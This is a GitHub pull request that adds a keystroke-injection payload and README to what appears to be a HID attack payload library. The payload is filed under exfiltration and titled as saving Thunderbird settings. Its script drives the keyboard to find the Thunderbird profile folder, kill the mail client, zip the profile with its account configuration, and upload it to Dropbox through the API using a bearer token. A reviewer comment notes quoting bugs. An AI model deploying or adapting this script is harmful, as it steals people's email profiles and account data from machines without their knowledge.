-
Notifications
You must be signed in to change notification settings - Fork 1.5k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Save Your Thunderbird Settings via Dropbox #687
Closed
Closed
Changes from all commits
Commits
Show all changes
7 commits
Select commit
Hold shift + click to select a range
0b07031
Save Your Thunderbird Settings via Dropbox
aleff-github f158977
Update payload.txt
aleff-github a39f4fe
Adapted to the use of variables
aleff-github 061a507
[+] ATTACKMODE
aleff-github a1f6b51
Update payload.txt
aleff-github a34529b
Update payload.txt
aleff-github a6b8651
Update payload.txt
aleff-github File filter
Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
There are no files selected for viewing
131 changes: 131 additions & 0 deletions
131
payloads/library/exfiltration/Save_Your_Thunderbird_Settings/README.md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,131 @@ | ||
| # Save Your Thunderbird Settings via Dropbox | ||
|
|
||
| Thunderbird version, build ID, user agent, host machine information (RAM, available space, GPU...), email account configuration and much more available through this juicy Thunderbird feature. | ||
|
|
||
| This payload is designed in order to make Thunderbird configuration extraction immediate so that you can work in speed. It can be used, for istance, in case you have a lot of devices and want to quickly and manually save every single Thunderbird configuration. | ||
|
|
||
| **Alert!** I have also uploaded my personal Dropbox token, please don't use it because I need it for my own stuff! | ||
|
|
||
| **Category:** Exfiltration | ||
|
|
||
| ## Index | ||
|
|
||
| - [Overview](#overview) | ||
| - [Requirements](#requirements) | ||
| - [Test Environment](#test-environment) | ||
| - [Configuration](#configuration) | ||
| - [Functionality](#functionality) | ||
| - [System Detection](#system-detection) | ||
| - [Opening Thunderbird](#opening-thunderbird) | ||
| - [Copying Profile Folder Path](#copying-profile-folder-path) | ||
| - [Opening PowerShell and Uploading to Dropbox](#opening-powershell-and-uploading-to-dropbox) | ||
| - [Notes](#notes) | ||
| - [Credits](#credits) | ||
|
|
||
| ## Overview | ||
|
|
||
| This program automates the process of saving your Thunderbird settings to Dropbox. It is designed for Windows 10/11 systems and falls under the exfiltration category. The main functionality includes detecting the system state, opening Thunderbird, copying the profile folder path, compressing the profile folder, and uploading it to Dropbox. | ||
|
|
||
| ## Requirements | ||
|
|
||
| - **Dropbox Access Token:** You need a valid Dropbox access token to upload the file. | ||
| - **PowerShell:** The script uses PowerShell to execute commands and interact with the filesystem. | ||
| - **Thunderbird:** In order to exfiltrate the Thunderbird configuration, it is essential to have Thunderbird configured...obvious right? And yet... | ||
|
|
||
| ## Test Environment | ||
|
|
||
| - Thunderbird 115.11.1 (64 bit) | ||
| - Windows 10 Pro | ||
|
|
||
| ## Configuration | ||
|
|
||
| Before running the program, ensure to set the following parameters correctly/as you prefer: | ||
|
|
||
| - `#ACCESS_TOKEN`: Your private Dropbox access token | ||
| - `#ARCHIVE_NAME`: The name of the archive file to be created. | ||
| - `#DROPBOX_FOLDER_PATH`: The path in your Dropbox where the file will be uploaded. | ||
|
|
||
| ### I.E. | ||
|
|
||
| - **Configuration** | ||
|
|
||
| ```shell | ||
| ARCHIVE_NAME="cache.zip" | ||
| ACCESS_TOKEN="aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj1Sdlk1cGxvbzFPSQ==" | ||
| DROPBOX_FOLDER_PATH="/" | ||
| ``` | ||
|
|
||
| - **1°** | ||
|
|
||
| ```plaintext | ||
| [88] QUACK STRING -DestinationPath ./cache.zip | ||
| ``` | ||
|
|
||
| - **2°** | ||
|
|
||
| ```plaintext | ||
| [93] QUACK STRING $filePath = "$env:TEMP/cache.zip" | ||
| ``` | ||
|
|
||
| - **3°** | ||
|
|
||
| ```plaintext | ||
| [99] QUACK STRING $dropboxPath = "/cache.zip" | ||
| ``` | ||
|
|
||
| - **4°** | ||
|
|
||
| ```plaintext | ||
| [102] QUACK STRING $accessToken = "aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj1Sdlk1cGxvbzFPSQ==" | ||
| ``` | ||
|
|
||
| ## Functionality | ||
|
|
||
| ### System Detection | ||
|
|
||
| The program starts by detecting whether the system reflects the CAPSLOCK state. This is used to set a dynamic boot delay. If CAPSLOCK is not reflected, a maximum delay of 3000ms is applied. | ||
|
|
||
| ### Opening Thunderbird | ||
|
|
||
| The script then opens Thunderbird and navigates through the settings to locate the profile folder. This path is copied to the clipboard for further use. | ||
|
|
||
| ### Copying Profile Folder Path | ||
|
|
||
| The copied path of the Thunderbird profile folder is used to compress the profile data into a ZIP file. | ||
|
|
||
| ### Opening PowerShell and Uploading to Dropbox | ||
|
|
||
| Using PowerShell, the script performs the following actions: | ||
|
|
||
| 1. **Navigate to TEMP Directory:** Changes the directory to the temporary environment path. | ||
| 2. **Stop Thunderbird Process:** Stops the Thunderbird process to ensure the profile data is not being used. | ||
| 3. **Compress Profile Folder:** Compresses the profile folder into a ZIP file. | ||
| 4. **Upload to Dropbox:** Uploads the ZIP file to the specified Dropbox folder using the Dropbox API. | ||
| 5. **Cleanup:** Removes the local ZIP file after the upload is complete. | ||
|
|
||
| ## Notes | ||
|
|
||
| - This program was created for educational and demonstrative purposes. Unauthorized access and exfiltration of data is illegal. | ||
| - Ensure you have the necessary permissions before running any script that modifies or transfers personal or sensitive data. | ||
|
|
||
| ## Credits | ||
|
|
||
| <h2 align="center"><a href="https://aleff-gitlab.gitlab.io/">Aleff</a></h2> | ||
| <div align=center> | ||
| <table> | ||
| <tr> | ||
| <td align="center" width="96"> | ||
| <a href="https://github.com/aleff-github"> | ||
| <img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" /> | ||
| </a> | ||
| <br>Github | ||
| </td> | ||
| <td align="center" width="96"> | ||
| <a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/"> | ||
| <img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" /> | ||
| </a> | ||
| <br>Linkedin | ||
| </td> | ||
| </tr> | ||
| </table> | ||
| </div> |
121 changes: 121 additions & 0 deletions
121
payloads/library/exfiltration/Save_Your_Thunderbird_Settings/payload.txt
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,121 @@ | ||
| ############################################################### | ||
| # # | ||
| # Title : Save Your Thunderbird Settings via Dropbox # | ||
| # Author : Aleff # | ||
| # Version : 1.0 # | ||
| # Category : Exfiltration # | ||
| # Target : Windows 10/11 # | ||
| # # | ||
| ############################################################### | ||
|
|
||
| ATTACKMODE HID | ||
|
|
||
| # Variables Settings | ||
| ARCHIVE_NAME="cache.zip" | ||
| ACCESS_TOKEN="aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj1Sdlk1cGxvbzFPSQ==" | ||
| DROPBOX_FOLDER_PATH="/" | ||
| DROPBOX_CONST_LINK="https://content.dropboxapi.com/2/files/upload" | ||
|
|
||
| # Opening Thunderbird settings | ||
| QUACK DELAY 1500 | ||
| QUACK GUI r | ||
| QUACK STRING thunderbird | ||
| QUACK ENTER | ||
| QUACK DELAY 1000 | ||
| QUACK TAB | ||
| QUACK TAB | ||
| QUACK TAB | ||
| QUACK TAB | ||
| QUACK DELAY 500 | ||
| QUACK ENTER | ||
| QUACK DELAY 500 | ||
| QUACK UPARROW | ||
| QUACK UPARROW | ||
| QUACK DELAY 500 | ||
| QUACK ENTER | ||
| QUACK DELAY 500 | ||
| QUACK UPARROW | ||
| QUACK UPARROW | ||
| QUACK UPARROW | ||
| QUACK DELAY 500 | ||
| QUACK ENTER | ||
| QUACK DELAY 500 | ||
|
|
||
| # Inside the settings | ||
| QUACK TAB | ||
| QUACK TAB | ||
| QUACK TAB | ||
| QUACK TAB | ||
| QUACK TAB | ||
| QUACK TAB | ||
| QUACK TAB | ||
| QUACK TAB | ||
| QUACK TAB | ||
| QUACK TAB | ||
| QUACK TAB | ||
| QUACK DELAY 500 | ||
| QUACK ENTER | ||
| QUACK DELAY 500 | ||
|
|
||
| # Inside The Profile Folder | ||
| QUACK TAB | ||
| QUACK TAB | ||
| QUACK TAB | ||
| QUACK TAB | ||
| QUACK DELAY 500 | ||
| QUACK ENTER | ||
| QUACK DELAY 500 | ||
| QUACK CTRL c | ||
| QUACK DELAY 500 | ||
| QUACK ALT F4 | ||
| QUACK DELAY 500 | ||
|
|
||
| # Powershell running... | ||
| QUACK GUI r | ||
| QUACK STRING powershell | ||
| QUACK ENTER | ||
| QUACK DELAY 1500 | ||
| QUACK STRING cd \$env:TEMP | ||
| QUACK ENTER | ||
| QUACK DELAY 500 | ||
| QUACK STRING Stop-Process -Name \"thunderbird\" -Force | ||
| QUACK ENTER | ||
| QUACK DELAY 500 | ||
| QUACK STRING Compress-Archive -LiteralPath | ||
| QUACK DELAY 500 | ||
| QUACK CTRL v | ||
| QUACK DELAY 500 | ||
| QUACK STRING -DestinationPath ./$ARCHIVE_NAME | ||
| QUACK ENTER | ||
| QUACK DELAY 1000 | ||
|
|
||
| # Exfiltration via Dropbox | ||
| QUACK STRING \$filePath = \"\$env:TEMP/$ARCHIVE_NAME\" | ||
| QUACK ENTER | ||
| QUACK DELAY 500 | ||
| QUACK STRING \$filePath = \$filePath -replace \"\\\", \"/\" | ||
| QUACK ENTER | ||
| QUACK DELAY 500 | ||
| QUACK STRING \$dropboxPath = \"$DROPBOX_FOLDER_PATH$ARCHIVE_NAME\" | ||
| QUACK ENTER | ||
| QUACK DELAY 500 | ||
| QUACK STRING \$fileContent = [System.IO.File]::ReadAllBytes(\$filePath) | ||
| QUACK ENTER | ||
| QUACK DELAY 500 | ||
| QUACK STRING \$headers = @{ | ||
| QUACK ENTER | ||
| QUACK DELAY 500 | ||
| QUACK STRING \"Authorization\" = \"Bearer $ACCESS_TOKEN\" | ||
| QUACK ENTER | ||
| QUACK DELAY 500 | ||
| QUACK STRING \"Dropbox-API-Arg\" = (\"{`\"path`\": `\"\" + \$dropboxPath + \"`\", `\"mode`\": `\"add`\", `\"autorename`\": true, `\"mute`\": false}\") | ||
| QUACK ENTER | ||
| QUACK DELAY 500 | ||
| QUACK STRING \"Content-Type\" = \"application/octet-stream\" | ||
| QUACK ENTER | ||
| QUACK DELAY 500 | ||
| QUACK STRING } | ||
| QUACK ENTER | ||
| QUACK DELAY 500 | ||
| QUACK STRING Invoke-RestMethod -Uri \"$DROPBOX_CONST_LINK\" -Method Post -Headers \$headers -Body \$fileContent; rm \$filePath; exit | ||
| QUACK ENTER | ||
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
the arguments need to be quote wrapped
This is not the only instance of this issue in this payload. I'd suggest testing to identify the issues and resolve them.